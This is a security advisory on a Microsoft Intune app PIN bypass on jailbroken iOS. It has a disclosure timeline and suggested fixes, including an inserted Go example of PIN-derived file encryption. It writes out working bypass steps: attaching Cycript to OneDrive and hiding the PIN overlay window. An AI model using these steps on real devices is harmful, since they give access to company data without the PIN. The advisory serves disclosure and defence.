Microsoft Intune App PIN Bypass

Posted Feb 13, 2018
Authored by Stephan Sekula

Compass Security discovered a design weakness in Microsoft Intune's app protection. This weakness allows a malicious user that gets hold of an employee's iOS device to access company data even without knowing the app PIN.

tags | exploit
systems | cisco, ios
SHA-256 | 9eb901ef1974be004d63aa35bd969efac3bd77a0a761e1cbabb90340bf37e26c

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Microsoft Intune [1]
# Vendor: Microsoft
# CSNC ID: CSNC-2017-027
# Subject: App PIN Bypass
# Risk: Medium
# Effect: Locally exploitable
# Author: Stephan Sekula <stephan.sekula@compass-security.com>
# Date: 31.08.2017
#
#############################################################

Introduction:
-------------
Define a mobile management strategy that fits the needs of your organization. Apply flexible mobile device and app management controls that let employees work with the devices and apps they choose while protecting your company information. [1]

Compass Security discovered a design weakness in Microsoft Intune's app protection. This weakness allows a malicious user that gets hold of an employee's iOS device to access company data even without knowing the app PIN.


Technical Description
---------------------
Microsoft Intune supports protection policies such as requiring a PIN to access a managed app. In the current implementation, however, the app PIN merely shows and hides an overlay screen; access to the stored files is restricted at the UI level only, not by any protection of the data itself.

Therefore, if the device is jailbroken, a simple Cycript script can be written to hide the overlay and use the UI to access all stored files.

To bypass the PIN, one needs to find the app's process ID (PID):
# ps aux | grep OneDrive
mobile 2086 1.2 4.9 1287904 100480 ?? Ss 11:06AM 0:05.59 /var/containers/Bundle/Application/AE292B95-58D2-4ECE-B7DF-767F0679706C/OneDrive.app/OneDrive

Attach to the app's process using Cycript and list the current view's details:
# cycript -p 2086
cy# UIApp.keyWindow.recursiveDescription().toString()
<CMARAppRestrictionsWindow: 0x105088e00; baseClass = UIWindow; frame = (0 0; 768 1024); gestureRecognizers = <NSArray: 0x17045b630>; layer = <UIWindowLayer: 0x170228180>>
| <UITransitionView: 0x1050aab80; frame = (0 0; 768 1024); autoresize = W+H; layer = <CALayer: 0x1702301a0>>
| | [CUT BY COMPASS]
| | | | <UIButtonLabel: 0x1050ad1a0; frame = (299.5 6.5; 170.5 27.5); text = 'Forgot your PIN?'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x170295950>>

Now, the overlay window can be hidden:
cy# [#0x105088e00 setHidden: YES]

The above command hides the PIN request window and thereby grants access to the files through the mobile app's UI.


Workaround / Fix:
-----------------
The PIN protection mechanism should be revisited. One solution would be to encrypt all documents with a key derived from the user's PIN, rendering a simple Cycript bypass of the overlay useless, since the bypass would only expose ciphertext.
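As an added example (not code from the advisory or from Microsoft's Intune app), the Go program below shows the encrypt-at-rest design the fix suggests: each document is sealed with AES-256-GCM under a key derived from the PIN with PBKDF2-HMAC-SHA256, so hiding the overlay window no longer yields readable files, and a wrong PIN fails the GCM tag check instead of revealing anything. The function names, the 16-byte salt, the 12-byte nonce and the iteration count are assumptions made for this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
)
const saltLen, nonceLen, iterations = 16, 12, 100000 // constructed parameters for this example

// pinKey derives a 32-byte AES key from the PIN: PBKDF2-HMAC-SHA256 (RFC 8018), one output block.
func pinKey(pin string, salt []byte) []byte {
	mac := hmac.New(sha256.New, []byte(pin))
	mac.Write(salt)
	mac.Write([]byte{0, 0, 0, 1}) // PBKDF2 block index 1
	u := mac.Sum(nil)
	key := append([]byte(nil), u...)
	for i := 1; i < iterations; i++ { // U_i = HMAC(pin, U_{i-1}); key ^= U_i
		mac.Reset()
		mac.Write(u)
		u = mac.Sum(nil)
		for j := range key {
			key[j] ^= u[j]
		}
	}
	return key
}
func aeadFor(pin string, salt []byte) cipher.AEAD {
	block, _ := aes.NewCipher(pinKey(pin, salt)) // key is always 32 bytes: cannot fail
	aead, _ := cipher.NewGCM(block)              // standard 12-byte nonce: cannot fail
	return aead
}
// sealDocument encrypts a file at rest. Layout: salt || nonce || ciphertext+tag.
func sealDocument(pin string, plaintext []byte) ([]byte, error) {
	hdr := make([]byte, saltLen+nonceLen)
	if _, err := rand.Read(hdr); err != nil {
		return nil, err
	}
	blob := append([]byte(nil), hdr...) // copy so Seal appends the ciphertext after the header
	return aeadFor(pin, hdr[:saltLen]).Seal(blob, hdr[saltLen:], plaintext, nil), nil
}
// openDocument yields plaintext only for the right PIN and an untampered blob (GCM tag check).
func openDocument(pin string, blob []byte) ([]byte, error) {
	if len(blob) < saltLen+nonceLen {
		return nil, errors.New("blob too short")
	}
	salt, nonce, ct := blob[:saltLen], blob[saltLen:saltLen+nonceLen], blob[saltLen+nonceLen:]
	return aeadFor(pin, salt).Open(nil, nonce, ct, nil)
}
```

A four- to six-digit PIN has little entropy, so in a real app the PIN-derived key should be combined with a device-bound secret (for example a Keychain item) and a high iteration count to resist offline guessing against a copied container.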

Furthermore, the app should verify whether the user's device is jailbroken, and if a jailbreak is detected, all managed apps and their data should be wiped from the device.


Timeline:
---------
2017-08-22: Discovery by Stephan Sekula
2017-09-17: Initial vendor notification
2017-09-18: Initial vendor response
2017-10-04: Asking vendor for an update
2017-10-04: Vendor replies that engineers are working on reproducing the issue
2017-11-01: Asking vendor for an update
2017-11-02: Vendor replies that the root cause is a vulnerability in iOS. Case is marked as won't fix.
2018-02-13: Public disclosure


References:
-----------
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune